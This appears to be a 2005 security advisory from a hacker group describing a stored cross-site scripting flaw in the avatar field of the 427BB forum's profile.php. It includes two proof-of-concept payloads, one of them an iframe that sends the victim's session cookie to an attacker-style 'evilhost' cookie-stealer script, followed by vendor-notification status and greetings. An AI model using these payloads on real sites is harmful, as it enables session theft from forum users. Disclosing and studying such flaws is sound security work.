[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG006 
 [] Monday 03/01/05 
 [] 427BB  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
  
 Vulnerable: 427BB (Any Version)  
  
  
 ---  
  
 General Information:  
  
 427BB Is a simple board and I have no idea why I'm 
releasing this because Its very unpopular but what 
the hell. Its based on PHP And MySQL  
  
 ---  
  
 Description:  
  
 In profile.php there is a avatar field that is 
vulnerable to a XSS attack by a remote attacker. The 
Avatar string isn't filtered of < >. This makes is 
very easy for a attacker to steal a session.  
  
 ---  
  
 PoC Code  
 Place the following code into the avatar field and 
save it then reload the profile page and it will 
execute this code.  
  
 ">&lt;script 
language="javascript">alert("b00");&lt;/script&gt;<"  
  
 Some more code this by Blademaster  
  
 "><iframe 
SRC="http://www.evilhost.com/cookiestealer.php?cookie=" 
WIDTH=1 HEIGHT=1></iframe><"  
  
 ---  
  
 Fix and Vendor status:  
  
 Vendor has been notified, expect official patch 
soon. 
 
 ---  
 
Greetz: 
 
All the people at hackerlounge.com, JWT, 
TGS-Security.com and JWT-Security.net. 
Specifically: 
 
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster, 
Modzilla, Pingu, Jake Johnson, Afterburn, airo, 
cardiaC, chis, ComputerGeek, deep_phreeze, dudley, 
evasion, eXtacy, Mattewan, Afterburn, 
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite, 
Slarty, NoUse, Snake (I hate you), Surreal (I hate 
you), -=Vanguard=-, The_IRS, puNKiey, driedice, 
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER, 
voteforpedro, Cryptic_Override, kodaxx, 
~CreEpy~NoDquE~, Brainscan, the_exode, 
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and 
anyone else I forgot.  
 
 
--- 
 
Credit: 
 
HRG - Hackerlounge Research Group 
http://www.Hackerlounge.com 
 
Partial credit is also given to 
lancastertechnologies.org, founded by JWT. 
 
  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]  
 []  
 [] HRG - Hackerlounge Research Group 
 [] Release: HRG006 
 [] Monday 03/01/05 
 [] 427BB  
 []  
 [] The author can't be held responsible for any 
damage  
 [] done by a reader. You have your own resonsibility  
 [] Please use this document like it's meant to.  
 []  
 [][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]